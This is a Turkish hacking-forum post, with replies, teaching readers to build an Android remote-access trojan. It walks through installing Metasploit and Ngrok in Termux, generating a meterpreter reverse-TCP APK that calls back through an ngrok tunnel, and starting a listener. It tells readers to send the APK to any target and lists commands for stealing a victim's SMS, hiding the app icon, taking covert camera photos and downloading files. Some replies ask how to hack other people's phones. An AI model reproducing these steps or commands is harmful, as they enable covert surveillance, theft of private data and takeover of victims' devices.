İyi Forumlar!TROJAN(TELEFON HACKLEME) OLUŞTURMA
KÖTÜYE KULLANIM KİŞİYE AİTTİR YAPİLAN HİÇBİRŞEYDEN SORUMLU DEĞİLİZ
Sırayla neleri anlatacağım
1)Metasploit,Trojen,Ngrok tanımları anlatılacak
2)Metasploit ve Ngrokun nasıl kurulacağı anlatıyorum
3)Metasploit ve Ngroku kurduktan sonra nasıl trojen oluşturulur
1)
Metasploit,Trojen,Ngrok kavramları nedir?
A)Trojen nedir
B)Metploit nedir
C)Ngrok nedir
A)Trojen nedir; Trojan, genellikle meşru yazılım kılığındaki bir tür kötü amaçlı yazılımdır. Trojanlar, kullanıcıların sistemlerine erişmeye çalışan siber hırsızlar ve korsanlar tarafından kullanılabilir. Kullanıcılar genellikle bir tür sosyal mühendislik tarafından kandırılarak Trojanları sistemlerine yükler ve çalıştırırlar. Trojanlar etkinleştirildikten sonra siber suçluların sizi takip etmelerini, hassas verilerinizi çalmalarını ve sisteminize arka kapı erişimi elde etmelerini sağlar. Bu işlemler arasında şunlar bulunabilir:
Veri silme
Veri engelleme
Veri değiştirme
Veri kopyalama
Bilgisayarların veya bilgisayar ağlarının performansını düşürme
Truva atları, diğer bilgisayar virüsleri ve solucanlarının aksine kendi kendilerine çoğalamaz
B)Metasploit nedir; Metasploit, sızma testlerinde kullanılabilecek en idal yazılımlardan birisidir, içerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu bir altyapıdır. Metasploit ile sadece saldırı yapılmaz. İşletim sistemlerinde yönelik backdoorlar oluşturulabilir ve bunlar üzerinden hedef sisteme saldırı ve ele geçirme işlemi yapılır.
C)Ngrok nedir; Ngrok herhangi bir Firewall veya NAT arkasında koşan yerel sunucumuzu tünelleyerek internete çıkartmamızı sağlayan reverse proxy yazılımıdır.(bu yazılşım sayesinde modemde port açmamıza gerek yoktur)
2)
Metasploit ve Ngrokun nasıl kurulur?
A)Metasploit nasıl kurulur?
B)Ngrok nasıl kurulur?
A)Metasploiti kuralım;
Metasploit benim tooldan kuracaz çünkü normal kurarsak ruby hatası alacaz msfconsolu çalıştırırken, isterseniz deneyin
Metasploiti kuralım fakat bu aşamada adımları doğru yapmazsak tekrar hata alırız en küçük bişey bile kurulumu etkiler o yüzden termuxu sıfırlıyoruz ve sıfırladıktan sonra hiçbirşey kurmuyoruz
bu işlemleri yapmadan kurarsaniz %90 hata verecektir sonra gurupta "NeDeN HaTa VeRdİ" "ToOL BoZuK YhA" yazmayin
kodlara gelelim
bazı kişilerde termux repo sorunu olduğu için toolu indirmeden önce
termux-change-repo
komutunu yazıyoruz karşımıza grafiksel bi arayüz çıkacak orda
bu videoda yapılanın aynısını yapacaksınız
videodakini yaptıktan sonra başlıyalım kurmaya
(gelen soruları görmek için ekranı büyültün,ve tüm gelen sorularda küçük y basın)
1-pkg install git -y
2-git clone GitHub - jokzilla/metakurucu
3-cd metakurucu
4-chmod +x *
5-bash metakurucu.sh
toolumuz indi 1i seçiyoruz ve kurulum başladı
termuxu yeniden başlatın yazısı geldikten sonra termuxu arka plandan kapatıyoruz sonra bildirim panelini açıyoru ve ordanda exit diyoruz
burdaki işlemimiz bu kadar şimdi ngroku kuralım
B)Ngroku kuralım;
termuxu tekrar açıyoruz
1-pkg install git -y
2-git clone GitHub - Umutkaratools/NGROK-KURULUM
3-cd NGROK-KURULUM
4-chmod 777 ngrok-kurulum.sh
5-bash ngrok-kurulum.sh
Ngrok kurulmadıysa BURAYA girin
ngrok kuruludu fakat tcp bağlantısı açmamız için ngrokun sitesine;
ngrok - secure introspectable tunnels to localhost
kaydolup ordaki tokeni kopyalamamiz gerekiyor yeşil renk ile işaretlediğim yeri(token) kopyalıyoruz ve terminale yapıştırıyoruz(./ almıyoruz ngroktan itibaren kopyaliyoruz)
3)
Trojan nasıl oluturulur;
ngrok tcp 1275 yazıyoruz bunu yaparken mobil veri ile internet paylaşımının açık olması gerekiyor bu resimdeki
online yazan yer kırmızı olursa demeki sorun vardır
ngrok ekranını asla kapatmıyoruz kapatırsak dinleme gidecektir
termux-setup-storage
depolama izni veriyoruz çünkü trojenin sdcarda(dahili hafıza) kaydedilmesi için
soldan kaydırarak new sesion diyoruz
resimde belirttiğim gibi altaki paylodda LHOST vs RHOST yazan yere burdaki bilgiyi yazacaz(sizde verilenleri yazin sizde)
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk
sondaki android apk yazan yer trojanimizin ismidir istediğinizi yazabilirsiniz fakat sonuna .apk yazmak zorundasınız enter basıyoruz ve
trojaniniz sdcard(dahili hafızaya kaydoldu)
TROJENİ DİNLEMEYE ALALIM
msfconsole yazıp entere basıyoruz ve 15-20 saniye msfconsole ekranının sçılmasını bekliyoruz ardından
Metasploit'te Çoklu işleyiciyi başlatmak için bu komutu yazıyoruz;
↓↓↓
use exploit/multi/handler
burda trojeni oluşturuken yazdığımız payloadıı yazıyoruz yani;
↓↓↓
set payload android/meterpreter/reverse_tcp
Şimdi oturumu dinlemek istediğiniz LHOST'u ayarlıyoruz yani;
↓↓↓
set LHOST 127.0.0.1
Şimdi oturumu dinlemek istediğiniz RPORT'u ayarlıyoruz yani "ngrok tcp 1275"
yazdığımız yere burdaki sayıyı alıyoruz "1275"
↓↓↓
set LPORT 1275
ve son komutumuzu yazıyoruz exploit diyerek dinlemeye alıyoruz artık oluşturduğumuz apkyı istediğimiz kişiye atıyoruz ve o indirip açtığında böyle bi ekran karşımıza çıkacak(meterpreter yazmazsa gorseldeki gibi yanliş yaptiğiniz biseyler vardir)
↓↓↓
help yazıp neler yapabileceğimze bakıyoruz iyi kullanımlar
İŞİNİZE YARIYACAK BAZI KOMUTLAR
Kurbanın telefonundan telefonunuza SMS alın:
Bu komut size kurbanın telefonundan en son 50 SMS'i verecektir.
dump_sms
Kurbana gönderdiğiniz Apk'nin simgesini gizleyin:
Kurbanın telefonlarına bir uygulama yüklüyorsanız, kurbanın uygulamanın ve kurbanın kurban olma şansının aşağıdaki komutu kullanarak app.by kaldıracağını fark edeceği açıktır, uygulama simgesini kurbanın telefonundan gizleyebilirsiniz.
hide_app_icon
Kurbanın telefonunun ses modunu değiştirin:
aşağıdaki komutu kullanarak telefonu genel modda ayarlayabilirsiniz.
set_audio_mode -m 1
telefonu sessize almak için;
set_audio_mode -m 0
Kurbanın telefonundan fotoğraf çekin: Bu komut kurbanın kamerasından bir fotoğraf çekecek ve depolama klasörünüze gönderecektir.
webcam_snap
Kurbanların dosya depolamasına erişin:
Kurbanın dosyasına gidebilir ve herhangi bir klasördeki tüm verileri görebilirsiniz
cd /sdcard
Kurbanın telefonundan herhangi bir dosyayı indirin:
karşıdan yüklemek istediğiniz dosyaya gidin ve bu komutu yazın
download file-name
Kendi telefonuma sızdim ama ne foto ne SMS ler geliyorTrojan ile bunu başarabilirsin detaylı bir araştırma yapmanı tavsiye ederim
Komut yazman gerekKendi telefonuma sızdim ama ne foto ne SMS ler geliyor
Biraz eğitim araştırma ve heves 'le yapabilirsinbaşkasını telefonu nasıl hacleye bilirim
Cihazı ele geçirmek istiyorsanbaşkasını telefonu nasıl hacleye bilirim
Termux knkandroid te apk yapmak için hangi programı önerirsiniz peki
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.